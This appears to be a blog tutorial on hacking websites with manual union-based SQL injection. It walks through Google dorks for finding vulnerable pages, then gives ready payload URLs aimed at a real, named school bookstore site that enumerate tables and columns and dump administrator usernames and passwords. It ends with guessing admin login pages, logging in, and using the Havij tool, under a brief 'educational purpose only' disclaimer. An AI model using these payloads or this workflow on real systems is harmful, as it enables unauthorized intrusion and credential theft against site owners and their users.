This my second tutorial on hacking websites through sql injection attack, first one was using blind sql injection. In this Attack we hack database of Website and through which we can steal credentials and login to website using those credentials. if a site has an admin panel, then you can login to that admin panel and can get hold on whole Website.
Step 1: Find Vulnerable Websites
1.) Go to www.google.com and type :
a.)inurl: php?id=.
b.)inurl: asp?id=
Download Biggest Dork List fron HERE
Password= Redeyehack
This Google Dork is used to find websites which uses GET Method and hence may be vulnerable.
2.) After Finding the Website's vulnerable link, Suppose Website link is :
http://www.schoolarcade.com.pk/book_detail.php?id=309, Then Try
http://www.schoolarcade.com.pk/book_detail.php?id=309'
Now if you got any sql error like :
mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /home/schoolar/public_html/book_detail.php on line 41
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax
Then it Proves that site is Sqli Vulnerable. Now lets move to step 2.
Step 2: Find No of columns in table
1.) type order by 1-- at end of URL so that final URL became : http://www.schoolarcade.com.pk/book_detail.php?id=309 order by 1--
If u don't get error then try, order by 2-- and so on until u got the error. Suppose u got the error at order by 13--
It means there are total of 12 columns in table.
Step 3: Find Vulnerable Columns
1.) now at the end of url type: union select all 1,2,3,4,5,6,7,8,9,10,11,12 from information_schema.tables where table_schema=database(), ad replace id=309 with id=-309 so final url would become:
http://www.schoolarcade.com.pk/book_detail.php?id=-309 union select all 1,2,3,4,5,6,7,8,9,10,11,12 from information_schema.tables where table_schema=database()
Now you can see some numbers on screens as shown in image which shows column numbers which are vulnerable. In image we can see that column no 1,3,5,6,7,8 are vulnerable we will use column 7 and 8 in forgoing steps.
Here we write upto 12 because total no of column we find in previous step are 12. information_schema is a database which keep information of every column, table and constraint of database.
Step 4 : Finding Database version
1.) try this url : http://www.schoolarcade.com.pk/book_detail.php?id=-309 union select all 1,2,3,4,5,6,version(),8,9,10,11,12 from information_schema.tables where table_schema=database()
Here we replaced vulnerable column 7 with the "version()" a function used to display database version.
If it displays version greater than 5 as shown in image below, then you can go ahead otherwise leave this site and find another one.
Step 5 :Finding Table names
1.) Try this url : http://www.schoolarcade.com.pk/book_detail.php?id=-309 union select all 1,2,3,4,5,6,7,group_concat(table_name),9,10,11,12 from information_schema.tables where table_schema=database()
Here we replaced vulnerable column 8 with the "group_concat(table_name)". table_name column of information_schema.tables contain Table names of whole database.
Now you can see in image below it lists all the tables of current database. Here i Found an interesting table admin_users which lists username and passwords of site Administrators.
Step 6: Finding Columns names
1.) Try this url : http://www.schoolarcade.com.pk/book_detail.php?id=-309 union select all 1,2,3,4,5,6,7,group_concat(column_name),9,10,11,12 from information_schema.columns where table_schema=database()
Here we have replaces vulnerable column 8 with "group_concat(column_name)" and also replaced "information_schema.tables" with "information_schema.columns"
Now it will list all columns as shown in image below and we have to find columns related to admin_users table.
Columns corresponding to username and password are : user_id and user_pass. Now we have Table and Column Names. Now we just have to retrieve the data from table.
Step 8 : To retrieve the username and password, Replace vulnerable column 8 with "group_concat(user_id,0x3a,user_pass)", here user_id and user_pass are columns names and ox3a is Hex equivalent of ":" just used to separate username and password.
Replace string with "from information_schema ...." with "from admin_users" where admin_users is table_name.
Now you can view username and password as "admin::Password"
And Now you have site administrator's username and password also. you just have to find the login page of Admin
Step 9 : Finding Admin Page
1.) You can guess that or can try few common admin page like
a.) www.site.com/admin/
b.) www.site.com/administrators
c.) www.site.com/login.php
After finding the Login Page, login using the above found username and password...
Congrats!!!You have hacked the Website.
This is a manual Sqli Attack You can also use a Tool :
Havij Which will automatically find vulnerability and find all the tables and their data from a site database for you. You can download it from here
Note :This is for Educational Purpose only. Don't try it to cause any harm to any website or its Database